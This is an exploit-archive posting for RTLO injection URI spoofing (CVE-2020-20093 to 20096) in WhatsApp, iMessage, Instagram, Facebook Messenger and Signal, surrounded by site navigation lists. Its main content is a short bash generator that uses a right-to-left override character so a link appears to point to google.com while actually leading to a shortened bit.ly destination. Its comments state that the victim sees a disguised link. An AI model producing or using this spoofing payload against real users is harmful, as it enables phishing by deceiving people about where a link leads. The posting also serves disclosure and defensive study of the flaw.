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RTLO Injection URI Spoofing

Authored by Sick Codes, zadewg

Posted Mar 25, 2022

RTLO injection URI spoofing generator for WhatsApp, iMessage, Instagram, and Facebook Messenger.

tags | exploit, spoof

advisories | CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096

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# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger.
# CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version: 2.19.80 and below
# Tested on: Whatsapp Android
# Version: 2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android 107.0.0.11
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096

#!/bin/bash
# Author:      sickcodes
# Contact:     https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright:   sickcodes (C) 2022
# License:     GPLv3+

# References:   https://github.com/zadewg/RIUS
#              https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
#              https://sick.codes/sick-2022-40

APPEAR_AS="https://google.com"

DESTINATION="bit.ly/3ixIRwm"

printf "\n\n${APPEAR_AS}/${u202E${DESTINATION}}\n\n"

# copy paste into any of the above apps.
# victim will see a surreptitious link

# works on latest Signal (unpatched)
```

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11	12	13	14	15	16
17					
18	19	20	21	22	23
24					
25	26	27	28	29	30
31					

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October 2022
September 2022
August 2022
July 2022
June 2022
May 2022
April 2022
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Apple (1,926)
BSD (370)
CentOS (55)
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Fedora (1,690)
FreeBSD (1,242)
Gentoo (4,272)
HPUX (878)
iOS (330)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (44,315)
Mac OS X (684)
Mandriva (3,105)
NetBSD (255)
OpenBSD (479)
RedHat (12,469)
Slackware (941)
Solaris (1,607)

- Spoof (2,166)

SQL Injection (16,102)

TCP (2,379)

Trojan (686)

UDP (876)

Virus (662)

Vulnerability (31,136)

Web (9,365)

Whitepaper (3,729)

x86 (946)

XSS (17,494)

Other

SUSE (1,444)

Ubuntu (8,199)

UNIX (9,159)

UnixWare (185)

Windows (6,511)

Other

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